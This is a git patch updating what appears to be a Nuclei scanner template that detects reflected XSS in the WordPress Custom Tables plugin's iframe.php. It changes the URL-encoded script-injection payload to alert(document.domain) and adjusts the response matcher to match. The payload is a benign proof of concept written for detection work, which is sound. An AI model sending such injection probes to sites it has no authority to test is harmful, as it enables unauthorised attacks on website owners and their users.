From 57c3f3ec20722553b2a236db2f0f20ce3103906d Mon Sep 17 00:00:00 2001
From: Prince Chaddha <cyberbossprince@gmail.com>
Date: Mon, 19 Jul 2021 11:38:50 +0530
Subject: [PATCH] Update wp-custom-tables-xss.yaml

---
 vulnerabilities/wordpress/wp-custom-tables-xss.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/vulnerabilities/wordpress/wp-custom-tables-xss.yaml b/vulnerabilities/wordpress/wp-custom-tables-xss.yaml
index d29132cf89..c0918d72c5 100644
--- a/vulnerabilities/wordpress/wp-custom-tables-xss.yaml
+++ b/vulnerabilities/wordpress/wp-custom-tables-xss.yaml
@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
+      - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word